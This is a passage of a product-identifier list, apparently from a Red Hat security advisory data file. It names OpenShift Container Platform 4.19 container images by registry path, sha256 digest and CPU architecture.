"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:210a2e800a6a8e3e7f577e3e8b62841d9c4fbf644d44fd927f66fee17709defc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:85748fc89666992382ee0059ff56f2ad103a2f066d2e84e270b8dd00fa699c45_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c2c1f73f4ec1f7b91ebfc39a4282dddae2978a79150523a9c72748f50f7a2d89_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:47155911d2fc258d338ee6971d5690c24a02b6c7bb3606bab4b1901824db1f6b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:6723f26e9ad3469461e1f752819e048f819faef9cbebb6ed473d08f41393256f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:7c52ab73261a98a2c979547424a9a29519b147c8bcde814b3efbdc7ace885be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:b91171b9f56b994aa3bf574862cedd318db66039a1cdfb08798ee1700c0f956a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:4050f629b8d4af401707a5e0122a155bd110b6f80937a2e0cd3791a49b1deaeb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:77abdb2ebd4daa3e500f44aa6f65cd365dbc2d9d8874ca4793b9ee1a8b944b8e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:9ebe024a4484b52a59f1ed5c92db62b86e3709fc642983799ef49d2d9d8cd7ec_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a165973ac17958695bfe213fd4a651bb94bbd0e851fe81e97c8fe833300d8d31_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:3ab735360773e6eb8e7f35088cb7420de0b815a84ca87a9135a6cf19e97b5c93_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:97b3af6976324a521b0a6e615ce422f05dc3acee1885726abf447166939821c5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7f620ae9d70339b97b0719a725d8a8f398367238cfe33f312a1f0ef82afefcb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:d3cd466c6704a6f1aba413cf5cad5f551e71953adf3c0780011a60f72b4c81a7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:29e144f0cf3a9851b940809050df06a72bf01ad62938e8951b67aab956d6befe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d17917fccd90b94767a9a92d871bb54204568272946691755015410ae7c8084a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d8cbcc5fa3ec11a2abfe5f86bb1144c2682a34774a4f87db9dc4fc0691915c41_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eab489c24877c7868a6784cbf9534ed80125a1c4e88e1d31677ff028450d941c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:4c6d93338edf2c6e6633a530fcec5519e33b51c1c0e07558402d3aa52ef5c925_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:9b2dc7a7bf2ccc373348d47cb745507d6aae379b8b57c1ff828656476dd325c2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:aa29e3416d8bbb38417774faedd53058276393c5bd24d90bb6fcba42c60f7945_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:d2bb57710fa4b6bce2a2166507328563a79221a93e3b785652c75b10464980ab_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:581e5388025562d1814b612378873f26e27e84cb4a23a657d7a915cb02dff621_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b46c8f78db81e2da8ae6ab8bb08319ea90ef4cdc815c0aa87c45a706a4cfc0f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:6427aad3aec21c9f1b9b9ad6c93785247972ead44380069d38e446a79d1b1f2b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:d23fed56ef3bfaa7b89f21cba6063cc700b6b73eebb6fb3d98077c3335dfd9fd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:05dd72d920e18f245f13a436659250ffebd4acaa3bc8ac2a1387b2059af7bb7f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:2bc055a3ef3095325cc3d8d95d6c5149e6e34586e79bb8091dd89d6c2e546c72_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:85a930f0612b1fa7d455550a04666b723bb4402fec82481abf505a3f7c791526_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:c3ce5331bb023bea2bb1be11730cc3582c8de4dd8f22ed52fd531ceade69be2c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:16b454a5f9768dbfb1e51f32054bf46338c89f3ee1e9828362d3f340641c8209_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:84c26c0c2915619709a25cc9d5965f87517b6e5e15ee88b377bf45d9655d3d43_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:8f08a5275631222beb361db97e56b9be7ef24f2b8c98cb0de0efbbb844d339c6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:d6c3459d4243d17f867d3f2a40f8f82a176597b85e49b4fb131181de4c417286_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:898fde5963557880b3823bd46af8088248cb445cbe8909c8bbfe47e7887540a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:8ed88897f9c69a7018486d849e324d21da24df8f2597618f4e3ec9a5a9b7c211_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:ce9de5a46ede5b462a95a069d3e69e0944b51d0b65e8b557a5e41819978c502e_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e605c6228fb3a17648d4bf831c60b34032c000e625f232c2c841652b12ec56b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:446e5456c05c7d2bec67d89593839412d80fb3ed2d3187999ad35cbe4bef6254_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:ca13dacb50b72ce0a37639571e4725f447d773735f4ddd1eb787842184c6d16c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f4c5709aaed3be1c656067ba0a6f6a9c6612ac5044a9f659762cbfd8ac999f2f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f716b95f7c71d7c19652b152f542d31dc4afe25e49f303853a764aef57036215_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:79ccd40e05ae0921c4d5b53ecbbd84872bd5321c5af2db3e2336aa6a133d147c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:ea20d945814432b378647144a1bd5b9d86817d313afc11344780b85b3c3bc978_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:0a47f4c9013d8952c47ee25b3bd65fcb7f456cfb22d3604427eae1ea640a3b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:8471d6d7d895f46fb2a5d47003f30b9912bc364b7c9e968f3f956a30892039c3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:aa4e3baa62b954b5b608720705840545d15fd13a10f9f7559f388a0baa23b43b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:bb5b559822cbc33606bf85ce2f250ca390d32abdd72a3366264178cf96d9350f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:1f2e291faed6c919022e0aeb99da4937c21c9ea21f1d32f2012a1a9d090b35f1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:43691966b7a2bccfce36dabe72471924a9c5b36bac8e92dd34607d1216572064_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:c16d64bc9641e60f11486d22e0d1625024f11cc66a2ee4ea5bc28f3658e8cb72_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:d98ec7aa0c573d9a727fd30afb7844e7b70e380a8e2f81f57c58702858a73bbf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:46535766ac9cf5891d27f9ff7e0f237e6da936ec70eda335feb0daa7792be0a6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7943825a48e79ead36af88aaf9d6f391ffe9e7a0f975cad8022cb013e87bbc3d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7a634a90a2588298e8ae069655793200319b64fcd8f597a28ccdcfd7cbccfec3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:8325d7f01b4c91298b30264af086d7478d85d04f4427469c6bcfd9cd4e2ca8da_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:23a38593785b8a77c82fe981e8218363e58b55273e8d66b0dde4503627f891ba_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3414c5c5e88fc6e70cc1dc9db2f61bbd8200440983b0f7f538a323432e7ba6ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:cc214669704ff3c6bb09cecaf60a1f48f1110faa5db2fa08ecf43728318d315c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:d735e0c9269659f018b79543fb8bb04999139219635252d624516c48d32f87a1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:5e97a541ac477608c7ab93fdabd1ce26464278d04dbb60a41e9444648926b5ed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:66dd0ff7ebdf89393607ed43af70c5b19d7d062c4715dedde645cf7cf00042c6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6d0d678b8e234b026b11de75091fe5869edf76484325380a0bc2ea40d316828f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:72fc95856ec7db8a502bf2b09972d63f50671593a26366a9aa56d6153459fb79_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:35588ff05b4c23c28da38abaed98e46da42e24899bc6fe6b40508a77706a4a6b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:46bfd97dc7a9ceec42f309d5bc112e6eb8212b96278d70b5e67d4fd2f40170b7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:5015658d5bee0ff943bc69525816e23d34ca35ec3a818cf0130d58c8baea98b6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:560aafed0881129dc2e59d0639cf2924f25ecfc9b4104b9a9700c0ece0693a76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:2497f36ad41776147768069c63bab22f639770328273f69ef16473d41ce32278_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:269715c1fc118c5a352bb9a221e648f2fa24caabc0ae874d906e2947837b6a9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5a81fa31d2a53a7942e433df47983d0a9b17a3be01dc73802698a26c5a54557b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5f6089d286cfa67bcf24b6860c840e503fe431f8df8557324d9fae2725ee6f0d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:82412b7cf5683fb7a70749370015ea212339356d0443143e70ba439aba6d0b0f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:8e9affb2924d2c993f50e4baa132d3e3ddb4f1012154a80d9bf9114bddb10e49_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:9bb0d3806c90ff845c4dbe11678a15f2816a902e9fde4df463f3e85febdcfd8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:d14dd6230f53078a6cf0d3b1528d0d22995add08578ab3da323a4ff92d13cc31_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:6f971e62173e3772bc6c474b3f796d93ef9f01e1d098705177f06a82f56601b9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:988ab0315395f8580b26df4a0ebc13f53d47dd4bfb4160489f1d24c3c118c795_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:a51c6200b8f5a73c29e236c1a4ff59b61b54fe200fbed5f13d54583ea7f8f51e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:fc80f86e06eb2cc0fd6de0eebe896533169eb85bdd15e54b7b6a8e8722d3cf34_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:2d02a78de1b38dd1aa1159bffade3aaba19ee6ddf8b3a8f2b4a017cb2a6ea22e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3f3e0469a0d159c94ffc5063f08fa8af255d1e620b359264211b196cb330eb4e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:55f9b85e57f11e221edf4e30d65037caedd69a0a4d37d560d99225b992aa1cbb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:dbce78ed2734d0a9d61b3404fdcc6f4541b8dc5b95e4fb40b8f9157b002b2681_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:39dc4401c0fe4bdac4a4d5ff18880f92ce0cbf10e00208a564a50973ff2667b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:50613490849c11ce84b306bf77e8fd0e2d5e8e74d0db805f1dd73e7877a3d8a4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:a0fa55daf82f32ede8a24f467db6f6591c5f5810f3dfa4c5b095fe5ba8274595_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d17159405d993d6f0e812b36fc09809ae821807eadd5b9f1d448f4f188bd0e73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:1de5b7823150dabafe0ca7d026012a02e03da9f95ebab9389d84f82c4fb83dc7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:b12d8b79849779424f3cffd8ff8da719904dadb5cdb018f0056f39b3ccb593f8_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:cba950803b92bd6bd4edf5f6e4c6f6f92cc899132e530d2508d142deeb9366cd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:d5c61e25f1e62aab1c6a521f4184d3552fe23d82e3a080124bf8e38d4b2ba2cd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:68a9cd133540eed3257ca2d5fa6f8ef384c3f66cc3cb4a30c72228c3450bce49_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:92a4f2142815522fdeee0f26ed1841cb16c10ab93ec38512f64ce82a81a12bb6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e80c61f3f591b4a682b352c787e1715f7d9f4f06e209ef8dc82e41b8bded9b8e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:f5f04cf85a80bba86be83c2fdd946e2efe511959a0ff382620bb9f7aa25b8c71_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:920a0d0905c6decac8fa8ae599192003df5391c6672f6c6f5eec3b6d9a8e0fee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a247fbc173026dc90407f375b79904dc8d29daecacd96333fa6ef80b3186e8eb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a97b0c4ab3e8716aadd8773aac0e95cb23aaaf6b618a2f759a1a53ecf078345f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:fc7191fca813048d552379742516176d723b1b1616dd53dd5ac557d117437c7a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2848880f87cf2488a841e371c990a81b83e44e08e7e4b1599c2009f078080d85_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:5ec6c4b928751540b436763b99127acafab69b5dfc867cd4cf74871697327698_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:730d5918dbf2f364e8528b6c8036541fbbee9e81c1bd5f6985f87b4602bc4579_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:9fe8545ad96791b55050941f86c99eef5b8b88b927c0e1953ce3ee703b6bf525_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:233b4ee8499922834ec87e62c2d4f322062f8063c99a95010bcf817e6114af6e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:337f863c631718a87bb7c6f86491aab519c0885ab1fe4184dd33df493da56386_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:350c76802bc5210c06f8ee9ac9a4a7f2474505132c1eab2607bfab309f59e5f3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:43aa5f0fe9244c1aaf3912b184ffee644522a2ff3bd3aadd53db5b90b0c93c76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:28f0a87cf08f7f9134bbe4ca64a7bc38a8882ecb5c8c6d57d5bb8f9096cdb76b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:4a986e828ec8120aa34ff2e35fe51c1866af855ea48e21d41aaeddcb4563a5d7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:8fc1c4e8704ed03a5515293ed3b18f9cf2f72b57bf97f6f646f0c4b7dfd47d65_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:c8a812560939b0a79d1b687f36dd5c5b71d01bea059b07e3652b35678884d330_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:515b6d09bed60aa703612507005248bbda01c940605101e93897805a7f1e4666_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:b36db241db3e48fdc932865032dbedaf9d94816523648f4345f19acba26cd7f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e8b6d45610b94825d1f5525443529e99a5e68441a8f331e20746614a606dc475_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:f3405b744680f7e937609958ff100453abb5a7cff06344997be0b0a7b7fa29e3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0df3b71023897418a185bfc7a38f4f67e0a41b6733452fefd59c9d7edbec3df6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:49afa7e1da94ce712c27df4a3e01d4748b2a493b4c61527a8a895c24e3001648_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:afbb2ca0948d8280647626e33064e6fc0d72310244cd69e338efdcc1b1ea7c8b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:e689a8391301d7ce3ba922d5fee8624e5d7f9c7a23905f78a7171d9a182d3f1c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:93ddc3e527257964b98d041a3d830c1be67f8c781f93d562c328c1dee7b37ef1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:97611bba51f02868cd922555e6c8e75d7eb4b5d8a865a69fd957084f897a5033_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:3a47a587be70333ba3719bb416fb04c176e41ce27d2c051b1210717857fd9b92_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:d48293acc1ecfd8e08eed3f47d3c37eb9d5905642a04e12ed26434a222ed0476_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:25f2667e3ce28ce5f0326be23f78cc6eedd523d4d2cdcfee2c02565d14d16ec2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:ec8e975cdae392efc948e02d0a30b98809739aff380a856ec97e0367fd1d0179_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:70ec66ac0b28bc34120378d962fdfe8a2f2411591611eaf6df7d4e62b8076a7f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:cc3b4055bc35dcc6c701bca3092202adbdbf5edefe3737167475ee2431fc30c1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2b9e95c24afe6cdf775027984310e0388433100034ef17e8de50160370019063_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:47e0ce843654534a810ad00a3b0703d8abbf4b8f221c479bae47cceed4d944e1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:6c081df14b51b5bffaaf126426c8919de0821a460c3a7ec80abf95581b749609_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:7f52c583cdba43b214630766d8f050b322c936307f28e1951b47d2fdecd11acb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:470582fb21bf68d82be5cb2548bb4fd55827624330297d62b246a69b831153cd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:a362b4e6bd7979c2413fe2bed3f66be4a44508bf397115caa539fa0857e26527_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:c0935ced156f72b3a6a77ff11445c038bd0555d881b73c760c7291cc7d27749b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:f434571500312f9a43f76fb244efb3184388fa6c34e955228612364918c8f1c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5fa811100ce565454ba1e243b9d0b94ca6f9f630fe159d4a7de104eb844039e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:a40105662b9188d283206418a2884182a9aff74c2cf4f700df3bd69443773d8c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:bde91bb377421a028e30bb830721f120be505c245717b5e2a3e25e5e6754bd5a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:e4ca2b3866c381b5fbbf8f6be7f9a34f4dd86ef1f952624e28760ce20ca3be64_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:07c0eed66aca1eed3b7897a24d97c00cb77f592f9b6900c7fb2644b4cfae6797_ppc64le",
